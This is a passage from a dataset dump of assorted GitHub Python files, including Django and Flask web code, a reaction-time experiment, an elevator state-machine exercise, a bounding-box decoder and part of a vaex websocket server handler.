print(count_all(animals))\n","repo_name":"kotano/myCode","sub_path":"Hexlet/Python/3_dictionaries/count_all.py","file_name":"count_all.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11326187100","text":"from django import forms\nfrom blog.models import Post\n\nclass PostForm(forms.ModelForm):\n\n class Meta:\n model= Post\n fields = ('title','text')\n \n def save_form(self, request, instance, form, change):\n user = request.user \n instance = form.save(commit=False)\n if not change or not instance.author:\n instance.author = user\n instance.modified_by = user\n instance.save()\n form.save_m2m()\n return instance\n","repo_name":"redianmarku/MesoOn","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"8826189914","text":"from django.db import transaction\nimport logging\nimport uuid\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom api.companies.models import Company\nfrom api.documents.models import Document\nfrom api.documents.services.upload_document import UploadDocumentService\nfrom api.funds.models import Fund\nfrom api.documents.models import CompanyDataProtectionPolicyDocument\nfrom api.companies.constants import CONTENT_TYPE_MS_DOC\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = 'Create Interest Statement for Investor'\n\n def handle(self, *args, **options):\n for company in Company.objects.all():\n with open('api/companies/data/data_protection_notice.docx', 'rb') as file:\n\n uploaded_document_info = UploadDocumentService.upload(\n document_data=file,\n content_type=CONTENT_TYPE_MS_DOC\n )\n with transaction.atomic():\n document = Document.objects.create(\n partner_id=uuid.uuid4().hex,\n company=company,\n content_type=uploaded_document_info.content_type,\n title='Sample Data Protection Policy',\n extension=uploaded_document_info.extension,\n document_id=uploaded_document_info.document_id,\n document_path=uploaded_document_info.document_path,\n document_type=Document.DocumentType.FUND_DATA_PROTECTION_POLICY,\n file_date=timezone.now().date(),\n access_scope=Document.AccessScopeOptions.COMPANY.value,\n )\n CompanyDataProtectionPolicyDocument.objects.create(\n company=company,\n document=document\n )\n\n\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/companies/management/commands/create_company_fund_data_protection_policy.py","file_name":"create_company_fund_data_protection_policy.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70096199528","text":"#!/usr/bin/env python3\r\n\r\n# import time and random module\r\nimport time\r\nimport random\r\n\r\n\r\ndef run_experiment():\r\n \"\"\"\r\n This function is the main entry for the experiment.\r\n It calls and coordinates the other helper functions we will use\r\n for the experiment.\r\n \"\"\"\r\n\r\n # initialize a dictionary to store results in\r\n participant_info = {\r\n \"participantID\": \"\",\r\n \"age\": \"\",\r\n \"sex\": \"\",\r\n \"major\": \"\",\r\n \"reaction_times\": [],\r\n \"stimulus_types\": [],\r\n \"correct\": []\r\n }\r\n\r\n # call helper function collect_info(participant_info)\r\n collect_info(participant_info)\r\n\r\n # Call helper function prepare_stimuli()\r\n # to obtain a list of randomly shuffled stimuli\r\n stimuli = prepare_stimuli()\r\n\r\n # Call helper function present_instructions() to display\r\n # some text explaining the task\r\n present_instructions()\r\n\r\n # Call helper function start_main_loop(participant_info, stimuli)\r\n # to run the experiment!\r\n start_main_loop(participant_info, stimuli)\r\n\r\n # Call helper function save_results(participant_info)\r\n # to save the results from the experiment\r\n save_results(participant_info)\r\n\r\n # Say goodbye to the participant\r\n goodbye()\r\n\r\n\r\ndef start_main_loop(participant_info, stimuli):\r\n \"\"\"\r\n This function starts the experiment and runs\r\n len(stimuli) number of trials. As the experiment progresses, the participants'\r\n responses are stored into the responses key of the info dict.\r\n :param participant_info: the participant info dict with filled bio data\r\n :param stimuli: a list of randomly shuffled stimuli\r\n :return: nothing, since responses are stored in participant_info dict\r\n \"\"\"\r\n\r\n # We start the experiment by looping through the list of stimuli\r\n for stimulus in stimuli:\r\n # We obtain a timestamp of when the stimulus was presented\r\n start = time.time()\r\n\r\n # Then, we present the word by simply printing it to the screen\r\n # The \"\\n\" * 50 part simply print 50 newlines, to that the last stimulus is hidden\r\n # from the screen\r\n print(\"\\n\" * 50, stimulus)\r\n\r\n # After that, we wait for the participant to respond\r\n response = input()\r\n\r\n # Immediately after the response, we calculate the reaction time\r\n # we use the built-in round() function to round down the rt to\r\n # 4 decimal places\r\n rt = round(time.time() - start, 4)\r\n # ...we evaluate the response\r\n response_correct = evaluate_response(stimulus, response)\r\n # ...and add all the information to the participant info dict\r\n participant_info['reaction_times'].append(rt)\r\n participant_info['stimulus_types'].append(stimulus)\r\n participant_info['correct'].append(response_correct)\r\n\r\ndef evaluate_response(stimulus, response):\r\n \"\"\"\r\n This function evaluates a response as correct (1) or wrong (0)\r\n :param stimulus: a string (RED, or BLUE)\r\n :param response: the participant's response, should be a \"j\",\r\n if stimulus was RED, and 'f' is stimulus was BLUE\r\n :return: 1, if response correct, 0, if incorrect\r\n \"\"\"\r\n\r\n if stimulus == \"RED\" and response == \"j\":\r\n return True\r\n elif stimulus == \"BLUE\" and response == \"f\":\r\n return True\r\n else:\r\n # The only two correct responses are exhausted, so if we reach\r\n # this block, then the participant responded incorrectly\r\n return False\r\n\r\n\r\ndef present_instructions():\r\n \"\"\"\r\n This function simply presents the instructions\r\n and waits for the participant to respond with any key.\r\n \"\"\"\r\n\r\n # Prepare text as multi-line string\r\n instructions = \"\"\"\r\n Welcome to our reaction time experiment!\\n\r\n In the following, You are going to see a sequence of words.\\n\r\n The words can be of two types: RED or BLUE.\\n\r\n You are asked to press the follwing keys followed by ENTER depending\\n\r\n on the word that is presented:\\n\r\n For RED press the 'j'-key\\n\r\n For BLUE press the 'f'-key\\n\r\n It is important that you press the respective key followed by ENTER\\n\r\n as fast as possible!\\n\\n\\n\r\n Press ENTER to start the experiment.\\n\r\n \"\"\"\r\n\r\n # Print on screen and wait for response (collect input with input())\r\n print(instructions)\r\n input()\r\n\r\ndef prepare_stimuli():\r\n \"\"\"\r\n This function initializes a list with 20 randomly shuffled stimuli\r\n for our reaction time experiment. The stimuli comprise only two types: RED, BLUE\r\n Later, these stimuli will be presented in the console window.\r\n :return: a list with 20 stimuli in a shuffled order.\r\n \"\"\"\r\n\r\n # This line initializes a list with 10 'RED' and 10 'BLUE' stimuli\r\n stimuli = [\"RED\", \"BLUE\"] * 10\r\n\r\n # shuffle the stimuli\r\n random.shuffle(stimuli)\r\n\r\n return stimuli\r\n\r\n\r\ndef collect_info(participant_info):\r\n \"\"\"\r\n This function collects demographical data from the participant\r\n and writes it into the participant_info dictionary\r\n :param participant_info: a dictionary containing keys with empty value\r\n :return: nothing, since it modified the participant_info dict\r\n \"\"\"\r\n\r\n # Collect all data sequentially using the input() function\r\n partID = input(\"Enter a participant ID: \")\r\n age = input(\"Enter your age: \")\r\n sex = input(\"Enter your gender(m\\w\\o): \")\r\n major = input(\"Enter your subject of study: \")\r\n\r\n # Store input data in the dictionary\r\n participant_info['participantID'] = partID\r\n participant_info['age'] = age\r\n participant_info['sex'] = sex\r\n participant_info['major'] = major\r\n\r\ndef goodbye():\r\n \"\"\"Be nice to the participant and thank her or him for participation.\"\"\"\r\n\r\n # Define text as a multi-line string\r\n goodbye_text = \"\"\"\r\n Thank you for participating in the experiment!\\n\r\n Please remain seated until all participants are done.\\n\\n\\n\r\n Enjoy your day!\r\n \"\"\"\r\n\r\n # \"Clear screen\" and present text\r\n print(\"\\n\" * 50, goodbye_text)\r\n\r\n\r\ndef save_results(participant_info):\r\n \"\"\"\r\n This functions saves the participant infos to the disk.\r\n :param participant_info: the full dictionary\r\n :return: None\r\n \"\"\"\r\n\r\n # Construct a filename from ID and age\r\n file_name = participant_info[\"participantID\"] + \"_\" + \\\r\n str(participant_info['age']) + \".txt\"\r\n\r\n # Open the file as we already learned\r\n with open(file_name, \"w\") as outfile:\r\n\r\n\r\n # write the dict to file_name\r\n # convert to to a string to be able to write to a .txt file\r\n outfile.write(str(participant_info))\r\n\r\nif __name__ == \"__main__\":\r\n run_experiment()\r\n","repo_name":"imarevic/psy_python_course","sub_path":"notebooks/Chapter5/rtexperiment.py","file_name":"rtexperiment.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"7155635356","text":"import os\nimport requests\nimport base64\nfrom app import app, db\nfrom flask import render_template, request, redirect, session\nfrom flask_session import Session\n# Ignores broken pipe warning\n\nfrom helpers import apology, login_required\nfrom models import SpotifyUser, Artist\nfrom concertlogic import *\nfrom tempfile import mkdtemp\nimport config\n\n# from flask_login import login_required, current_user\ntry:\n # Python 3\n from urllib.parse import urlparse, parse_qs\nexcept ImportError:\n # Python 2\n from urlparse import urlparse, parse_qs\n\napp.config[\"SECRET_KEY\"] = os.urandom(24)\napp.config['SESSION_TYPE'] = 'filesystem'\n\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\n\nSEATGEEK_CLIENT_ID = os.environ['SEATGEEK_CLIENT_ID']\nSEATGEEK_SECRET = os.environ['SEATGEEK_SECRET']\nSEATGEEK_URL = os.environ['SEATGEEK_URL']\n\nSPOTIFY_CLIENT_ID = os.environ['SPOTIFY_CLIENT_ID']\nSPOTIFY_CLIENT_SECRET = os.environ['SPOTIFY_SECRET']\nSPOTIFY_URL = os.environ['SPOTIFY_API_URL']\n\nSession(app)\n\nuser_access_token = None\nuser = None\n\n# Ensure responses aren't cached\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n@app.template_filter('strftime')\ndef _jinja2_filter_datetime(date, fmt=None):\n date = dateutil.parser.parse(date)\n native = date.replace(tzinfo=None)\n format='%b %d, %Y'\n return native.strftime(format)\n\n@app.route('/')\n@app.route('/index')\ndef index():\n if user_access_token and user:\n # Find concerts\n # events = concerts(user)\n return render_template('index.html')\n else:\n return redirect('/login')\n\n@app.route('/login')\ndef login():\n return render_template('login.html', cid=SPOTIFY_CLIENT_ID, ac=user_access_token, message=\"Welcome! Please log in.\")\n\n@app.route('/logout')\ndef logout():\n user_access_token = None\n # session.clear()\n return render_template('login.html', cid=SPOTIFY_CLIENT_ID, ac=None, message=\"You have been logged out.\")\n\n@app.route('/callback/')\ndef callback():\n url = request.url\n # Converts url into a query object and extracts auth code\n query = parse_qs(urlparse(url).query)\n if 'code' in query:\n global user_access_token, user\n code = query['code']\n # Construct post request to retrieve access token\n data = {'grant_type':'authorization_code',\n 'code': code,\n 'redirect_uri': request.base_url,\n 'client_id': SPOTIFY_CLIENT_ID,\n 'client_secret': SPOTIFY_CLIENT_SECRET}\n\n response = requests.post('https://accounts.spotify.com/api/token', data=data)\n response = response.json()\n # print(response)\n\n user = get_user_obj(response[\"access_token\"])\n\n user_access_token = user['id']\n\n # ADD USER TO DB\n print('begin')\n spotify_user_id = user['id']\n spotify_access_token = response[\"access_token\"]\n # facebook_user_id = request.args.get('facebook_user_id')\n\n if not SpotifyUser.query.filter_by(spotify_user_id=spotify_user_id).count():\n db.session.add(SpotifyUser(spotify_user_id=spotify_user_id, spotify_access_token=spotify_access_token))\n db.session.commit()\n user = SpotifyUser.query.filter_by(spotify_user_id=spotify_user_id).first()\n update_relations(user)\n\n return redirect('/index')\n\n else:\n return apology('Error in authorization', 403)\n\ndef get_user_obj(token):\n response = requests.get('https://api.spotify.com/v1/me', headers={'Authorization': 'Bearer ' + token})\n response = response.json()\n\n return response\n","repo_name":"sf-18/concertmatcher","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32409159042","text":"\"\"\"\nText form module.\n\"\"\"\nfrom wtforms import Form, TextField, SelectField, SubmitField\nfrom wtforms.validators import Required, Length\n\n\nclass TextForm(Form):\n \"\"\"\n Text form class.\n \"\"\"\n start_word = TextField(\n u'start_with',\n validators=[\n Required(u'Required'),\n Length(min=1, max=10, message=u'up to 10'),\n ],\n render_kw={\"placeholder\": u\"e.g. 今日\"},\n )\n\n word_num = SelectField(\n u'word_num',\n coerce=str,\n choices=[(str(i), str(i)) for i in range(5, 21, 5)],\n )\n\n submit = SubmitField(\n u'Make a sentence',\n render_kw={\"class\": \"pure-button pure-button-primary\"}\n )\n","repo_name":"tsubasaogawa/virtual-ogawa","sub_path":"text_form.py","file_name":"text_form.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73388887849","text":"import time\n\n\nclass MaxErrorWeight(Exception):\n pass # print(\"Error, incorrect weight\")\n\n\nclass MinErrorWeight(Exception):\n pass # print(\"Error, incorrect weight\")\n\n\nclass ElevatorState:\n # weight = 0\n\n def __init__(self, elevator):\n self.elevator = elevator\n\n def get_state(self):\n raise NotImplementedError\n # def enter(self, weight): # писал это сначала, но сейчас не требуется (вроде)\n # pass\n #\n # def exit(self, weight):\n # pass\n #\n # def go_up(self):\n # pass\n #\n # def go_down(self):\n # pass\n\n\nclass EmptyState(ElevatorState):\n\n def enter(self, weight):\n # try:\n self.elevator.current_weight = weight\n if self.elevator.current_weight > self.elevator.max_weight:\n raise MaxErrorWeight\n elif self.elevator.current_weight < self.elevator.min_weight:\n print(\"Лифт пуст\")\n self.elevator.state = EmptyState(self.elevator)\n raise MinErrorWeight\n else:\n self.elevator.state = OccupiedState(self.elevator)\n\n # except MaxErrorWeight:\n # print(\"Перевес! Попробуйте ещё раз\")\n #\n #\n # except MinErrorWeight:\n # print(\"Недостаточный вес!\")\n\n def exit(self, weight):\n if self.elevator.current_weight - weight < 0:\n raise MinErrorWeight\n else:\n self.elevator.current_weight -= weight\n print(\"Лифт пуст\")\n\n def go_up(self):\n self.elevator.state = EmptyState(\n self.elevator) # print(\"Лифт на самом высоком этаже\") # зачем в эмти стайт это?\n\n def go_down(self):\n self.elevator.state = EmptyState(self.elevator)\n # print(\"Лифт на самом нижнем этаже\") # зачем в эмти стайт это?\n\n def get_state(self):\n return 'Ожидание...'\n\n def go_to_p(self, floor):\n if self.elevator.current_weight == 0:\n self.elevator.state = IncomingState(self.elevator)\n elevator.go_to_p(floor)\n\n\nclass OccupiedState(ElevatorState):\n\n def enter(self, weight):\n self.elevator.current_weight += weight\n # self.weight += weight\n # if self.elevator.current_weight + weight > self.elevator.max_weight:\n # print(\"Перевес!\")\n # self.elevator.state = EmptyState(self.elevator)\n # raise ErrorWeight\n\n # return False\n\n # elif self.elevator.current_weight + weight < self.elevator.min_weight:\n # print(\"Лифт пуст\")\n # self.elevator.state = EmptyState(self.elevator)\n # raise ErrorWeight\n #\n # else:\n # self.elevator.current_weight += weight\n\n def exit(self, weight):\n self.elevator.current_weight -= weight\n if self.elevator.current_weight == 0:\n self.elevator.state = EmptyState(self.elevator)\n\n def go_up(self, floor):\n if self.elevator.min_weight <= self.elevator.current_weight <= self.elevator.max_weight:\n if self.elevator.current_floor == self.elevator.max_floor:\n print(\"Выше некуда\")\n else:\n self.elevator.current_floor += floor - self.elevator.current_floor\n # elif self.enter(elevator.current_weight):\n # self.elevator.current_floor += 1 # ЭТО ЧТО ЗА ТАКОЕ?\n\n def go_down(self, floor):\n if self.elevator.min_weight <= self.elevator.current_weight <= self.elevator.max_weight:\n if self.elevator.current_floor == self.elevator.min_floor:\n print(\"Ниже некуда\")\n else:\n self.elevator.current_floor -= self.elevator.current_floor - floor\n\n def get_state(self):\n return \"В пути с пассажиром\"\n\n\nclass IncomingState(ElevatorState):\n\n def go_to_p(self, floor):\n if elevator.min_floor <= floor <= elevator.max_floor:\n if self.elevator.current_floor == floor:\n print(elevator.get_state())\n self.elevator.state = EmptyState(self.elevator)\n\n else:\n time.sleep(0.5)\n self.elevator.current_floor = floor\n print(elevator.get_state())\n self.elevator.state = EmptyState(self.elevator)\n else:\n raise ValueError\n\n def get_state(self):\n return \"На пути к пассажиру\"\n\n\nclass Elevator:\n def __init__(self, min_weight, max_weight, min_floor=0, max_floor=3): # блин лист ['p', '1', '2', '3']\n self.max_weight = max_weight\n self.min_weight = min_weight\n self.min_floor = min_floor\n self.max_floor = max_floor\n self.current_weight = 0\n self.current_floor = 0\n self.state = EmptyState(self)\n\n def enter(self, weight):\n self.state.enter(weight)\n print(\"Текущий вес:\", elevator.current_weight) # он разве не должен в ентер в состоянии вызываться???\n\n def exit(self, weight):\n self.state.exit(weight)\n print(\"Текущий вес:\", elevator.current_weight)\n\n def go_up(self, floor):\n self.state.go_up(floor)\n time.sleep(0.5)\n print(\"Текущий этаж:\", elevator.current_floor)\n\n def go_down(self, floor):\n self.state.go_down(floor)\n time.sleep(0.5)\n print(\"Текущий этаж:\", elevator.current_floor)\n\n def go_to_p(self, floor):\n self.state.go_to_p(floor)\n time.sleep(0.5)\n print(\"Текущий этаж:\", elevator.current_floor)\n\n def get_state(self):\n return self.state.get_state()\n\n\n#######################################################\n\nelevator = Elevator(min_weight=10, max_weight=500)\n\n#####################################################\nprint(elevator.get_state())\nelevator.go_to_p(1)\n#print(elevator.get_state()) # мы не можем перехватить поездку к пассажиру тк мы сразу меняем состояние на ожидание 🤷‍♂️\nelevator.enter(420) # вход тела\nprint(elevator.get_state())\nelevator.go_up(2)\nprint(elevator.get_state())\nelevator.go_up(3)\nelevator.go_up(5)\n\nprint(elevator.get_state())\nelevator.exit(420)\nprint(elevator.get_state())\nelevator.go_to_p(2)\n#print(elevator.get_state())\nelevator.enter(40)\nprint(elevator.get_state())\nelevator.go_down(1)\nprint(elevator.get_state())\n# print(\"Текущий этаж:\", elevator.current_floor) # спускаемся вниз\n\nelevator.exit(40)\n# print(\"Текущий вес:\", elevator.current_weight) # выход тела\nprint(elevator.get_state())\n","repo_name":"hakilfrog/russparti","sub_path":"lab4_elevator/lift_vladick_version.py","file_name":"lift_vladick_version.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"917060047","text":"import random\n\ndef mystery_int():\n random\n if random.random() > 0.5:\n return 2\n\ndef main():\n x = mystery_int()\n print(x)\n\n if x is not None:\n print(x*x)\n\nif __name__ == \"__main__\":\n main()","repo_name":"dingjiachengcn/CodeInPlace2023","sub_path":"nonetypr.py","file_name":"nonetypr.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34676226421","text":"from turtle import Screen, RawTurtle\r\n\r\nscreen = Screen()\r\nturtle = RawTurtle(screen)\r\n\r\n### Traje\r\nturtle.shape(\"turtle\")\r\n\r\n\r\n## Tamaño del punto y color\r\nturtle.dot(5, \"green\")\r\nturtle.fd(50)\r\n\r\nturtle.dot(5, \"red\")\r\nturtle.lt(120)## Gira a la izquierda\r\nturtle.fd(100)## Avanza 100\r\n\r\nturtle.dot(5, \"blue\")\r\nturtle.lt(170)\r\nturtle.fd(150)\r\n\r\nturtle.lt(170)\r\n\r\nscreen.mainloop() ## La pantalla espera un evento...\r\n","repo_name":"untxi/ada","sub_path":"Code/Tortuga.py","file_name":"Tortuga.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72271272167","text":"from typing import Optional, Tuple\n\nimport torch\nimport torch.nn as nn\n\nfrom cap.core.box_utils import box_center_to_corner, box_corner_to_center\nfrom cap.registry import OBJECT_REGISTRY\n\n\n@OBJECT_REGISTRY.register\nclass XYWHBBoxDecoder(nn.Module):\n \"\"\"Encode bounding box in XYWH ways (proposed in RCNN).\n\n Args:\n legacy_bbox (:obj:'bool', optional): Whether to represent bbox\n in legacy way. Default is False.\n reg_mean (:obj:'bool', tuple): Mean value to be subtracted from\n bbox regression task in each coordinate.\n reg_std (:obj:'bool', tuple): Standard deviation value to be\n divided from bbox regression task in each coordinate.\n \"\"\"\n\n def __init__(\n self,\n legacy_bbox: Optional[bool] = False,\n reg_mean: Optional[Tuple] = (0.0, 0.0, 0.0, 0.0),\n reg_std: Optional[Tuple] = (1.0, 1.0, 1.0, 1.0),\n ):\n super().__init__()\n\n assert len(reg_mean) == 4 and len(reg_std) == 4\n\n self.register_buffer(\n \"reg_mean\", torch.tensor(reg_mean), persistent=False\n )\n self.register_buffer(\n \"reg_std\", torch.tensor(reg_std), persistent=False\n )\n\n self._legacy_bbox = legacy_bbox\n\n def forward(\n self, boxes: torch.Tensor, boxes_delta: torch.Tensor\n ) -> torch.Tensor:\n\n box_cx, box_cy, box_w, box_h = box_corner_to_center(\n boxes, split=True, legacy_bbox=self._legacy_bbox\n )\n\n boxes_delta = (\n boxes_delta.detach().clone() * self.reg_std + self.reg_mean\n )\n\n dx, dy, dw, dh = torch.split(boxes_delta, 1, dim=-1)\n\n pred_cx = dx * box_w + box_cx\n pred_cy = dy * box_h + box_cy\n pred_w = torch.exp(dw) * box_w\n pred_h = torch.exp(dh) * box_h\n\n pred_boxes = box_center_to_corner(\n torch.cat([pred_cx, pred_cy, pred_w, pred_h], dim=-1),\n legacy_bbox=self._legacy_bbox,\n )\n\n return pred_boxes\n","repo_name":"xingyun-xy/cap","sub_path":"cap/models/base_modules/bbox_decoder.py","file_name":"bbox_decoder.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40098141999","text":"import numpy as np\n\nfrom experiments.experiment_main import names4paper_dict\n\ndata_experiment_name = \"Proceedings\"\n\nnumber_of_cores = 50\n\nk = 1\nalpha = 0.001\n\nmodel_names = list(names4paper_dict.keys())\n\nepsilons2try = np.round(np.logspace(np.log10(0.005), np.log10(0.5), num=10), decimals=3)\nepsilons2try = np.append(epsilons2try, np.round(np.logspace(np.log10(0.5), np.log10(10), num=5), decimals=3))\nepsilons2try = np.sort(np.unique(epsilons2try))\nrepetitions = list(range(10))\n","repo_name":"agussomacal/ConDiPINN","sub_path":"src/experiments/Proceedings/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16134626765","text":"from ctypes import pointer\nfrom typing import Any, Dict, List, Sequence, Set\n\nfrom tqdm import tqdm\n\nfrom imgsimsearch.abstract_image_provider import AbstractImageProvider\nfrom imgsimsearch.graph import Graph\nfrom similiraptor.core import (\n PtrSequence,\n fn_compareSimilarSequences,\n fn_countSimilarPixels,\n image_to_native,\n)\n\nSIM_LIMIT = 85 / 100\nSIMPLE_MAX_PIXEL_DISTANCE = 255 * 3\nTHUMBNAIL_DIMENSION = 32\nTHUMBNAIL_SIZE = (THUMBNAIL_DIMENSION, THUMBNAIL_DIMENSION)\n\n\nclass CppSimilarityComparator:\n __slots__ = (\"max_dst_score\", \"limit\", \"width\", \"height\")\n\n def __init__(self, limit: float, width: int, height: int):\n self.width = width\n self.height = height\n self.limit = limit\n self.max_dst_score = SIMPLE_MAX_PIXEL_DISTANCE * width * height\n\n def are_similar(self, p1: PtrSequence, p2: PtrSequence) -> bool:\n return (\n fn_compareSimilarSequences(\n p1, p2, self.width, self.height, self.max_dst_score\n )\n >= self.limit\n )\n\n\nclass CppSimilarityCounter:\n __slots__ = (\"max_pixel_dst\", \"limit\", \"width\", \"height\")\n\n def __init__(self, limit: float, width: int, height: int):\n self.width = width\n self.height = height\n self.limit = int(width * height * limit)\n self.max_pixel_dst = 3 * 10\n\n def are_similar(self, p1: PtrSequence, p2: PtrSequence) -> bool:\n return (\n fn_countSimilarPixels(p1, p2, self.width, self.height, self.max_pixel_dst)\n >= self.limit\n )\n\n\ndef compare_images_native(\n imp: AbstractImageProvider, output: Dict[Any, Sequence[Any]]\n) -> List[Set[Any]]:\n nb_images = imp.count()\n native_sequences = {}\n native_sequence_pointers = {}\n with tqdm(total=nb_images, desc=\"Generate numpy miniatures\") as pbar:\n for identifier, image in imp.items():\n sequence = image_to_native(image.resize(THUMBNAIL_SIZE))\n native_sequences[identifier] = sequence\n native_sequence_pointers[identifier] = pointer(sequence)\n pbar.update(1)\n assert len(native_sequences) == nb_images\n\n graph = Graph()\n nb_todo = sum(len(d) for d in output.values())\n sim_cmp = CppSimilarityComparator(\n SIM_LIMIT, THUMBNAIL_DIMENSION, THUMBNAIL_DIMENSION\n )\n with tqdm(total=nb_todo, desc=\"Make real comparisons\") as bar:\n for filename, linked_filenames in output.items():\n p1 = native_sequence_pointers[filename]\n for linked_filename in linked_filenames:\n p2 = native_sequence_pointers[linked_filename]\n if sim_cmp.are_similar(p1, p2):\n graph.connect(filename, linked_filename)\n bar.update(1)\n\n groups = [group for group in graph.pop_groups() if len(group) > 1]\n return groups\n","repo_name":"notoraptor/similiraptor","sub_path":"imgsimsearch/native_fine_comparator.py","file_name":"native_fine_comparator.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38607647928","text":"import tkinter as tk\n\nclass My_gui:\n def __init__(self):\n self.root = tk.Tk()\n self.root.geometry(\"500x500\")\n self.root.title(\"MessageBox\")\n\n # self.label1 = tk.Label(self.root, text='Hi!', font=('Arial', 20), fg=\"white\", bg=\"black\", height=5, width=5)\n # self.label1.pack() \n\n # self.test_btn = tk.Button(self.root, text=\"test button\", height=5, width=10)\n # self.test_btn.pack()\n\n self.test_textbox = tk.Text(self.root, height=5, font=(\"Arial\", 20))\n self.test_textbox.pack()\n\n self.checkVal = tk.IntVar()\n self.checkbox = tk.Checkbutton(self.root, text=\"Show Messagebox\", font=(\"Arial\", 20), variable=self.checkVal)\n self.checkbox.pack()\n\n self.messageBtn = tk.Button(self.root, text=\"Show Message\", command=self.message, font=(\"Arial\", 20))\n self.messageBtn.pack()\n\n self.root.mainloop()\n \n def message(self):\n if self.checkVal.get() == 1:\n print(self.test_textbox.get(\"1.0\", tk.END))\n else:\n print(\"Message\")\n\nMy_gui()\n","repo_name":"AaronYin5758/Tkinter","sub_path":"message_box.py","file_name":"message_box.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17078181822","text":"import asyncio\nimport logging\n\nimport vaex\nimport vaex.asyncio\nimport vaex.core._version\nimport vaex.server._version\nimport vaex.server.dataframe\n\nfrom vaex.encoding import serialize, deserialize, Encoding\nfrom .utils import exception\n\n\nTEST_LATENCY = 0\nlogger = logging.getLogger(\"vaex.webserver.websocket\")\n\n\nclass WebSocketHandler:\n def __init__(self, send, service, token=None, token_trusted=None):\n self.send = send\n self.service = service\n self.token = token\n self.token_trusted = token_trusted\n self.trusted = False\n self._msg_id_to_tasks = {}\n self.tasks = []\n\n async def handle_message(self, websocket_msg):\n try:\n await self._handle_message(websocket_msg)\n except BaseException as e:\n encoding = Encoding()\n websocket_msg = deserialize(websocket_msg, encoding)\n msg_id = websocket_msg['msg_id']\n msg = exception(e)\n await self.write_json({'msg_id': msg_id, 'msg': msg})\n logger.exception(\"unhandled exception\")\n\n async def _handle_message(self, websocket_msg):\n if TEST_LATENCY:\n await asyncio.sleep(TEST_LATENCY)\n msg_id = 'invalid'\n encoding = Encoding()\n try:\n websocket_msg = deserialize(websocket_msg, encoding)\n logger.debug(\"websocket message: %s\", websocket_msg)\n msg_id, msg, auth = websocket_msg['msg_id'], websocket_msg['msg'], websocket_msg['auth']\n\n token = auth['token'] # are we even allowed to execute?\n token_trusted = auth['token-trusted'] # do we trust arbitrary code execution?\n trusted = token_trusted == self.token_trusted and token_trusted\n\n if not ((token == self.token) or\n (self.token_trusted and token_trusted == self.token_trusted)):\n raise ValueError('No token provided, not authorized')\n\n last_progress = None\n ioloop = asyncio.get_event_loop()\n progress_futures = []\n\n def progress(f):\n nonlocal last_progress\n\n async def send_progress():\n vaex.asyncio.check_patch_tornado() # during testing asyncio might be patched\n nonlocal last_progress\n logger.debug(\"progress: %r\", f)\n last_progress = f\n # TODO: create task?\n return await self.write_json({'msg_id': msg_id, 'msg': {'progress': f}})\n # emit when it's the first time (None), at least 0.05 sec lasted, or and the end\n # but never send old or same values\n if (last_progress is None or (f - last_progress) > 0.05 or f == 1.0) and (last_progress is None or f > last_progress):\n def wrapper():\n # see https://docs.python.org/3/library/asyncio-task.html#asyncio.create_task\n # TODO: replace after we drop 36 support progress_futures.append(asyncio.create_task(send_progress()))\n progress_futures.append(asyncio.ensure_future(send_progress()))\n ioloop.call_soon_threadsafe(wrapper)\n return True\n\n command = msg['command']\n if command == 'list':\n result = self.service.list()\n await self.write_json({'msg_id': msg_id, 'msg': {'result': result}})\n elif command == 'versions':\n result = {'vaex.core': vaex.core._version.__version_tuple__, 'vaex.server': vaex.server._version.__version_tuple__}\n await self.write_json({'msg_id': msg_id, 'msg': {'result': result}})\n elif command == 'execute':\n df = self.service[msg['df']].copy()\n df.state_set(msg['state'], use_active_range=True, trusted=trusted)\n tasks = encoding.decode_list('task', msg['tasks'], df=df)\n self._msg_id_to_tasks[msg_id] = tasks # keep a reference for cancelling\n try:\n # TODO: this assumes all tasks succeed, but we also support 1 failing\n results = await self.service.execute(df, tasks, progress=progress)\n finally:\n del self._msg_id_to_tasks[msg_id]\n await asyncio.gather(*progress_futures)\n # make sure the final progress value is send, and also old values are not send\n last_progress = 1.0\n await self.write_json({'msg_id': 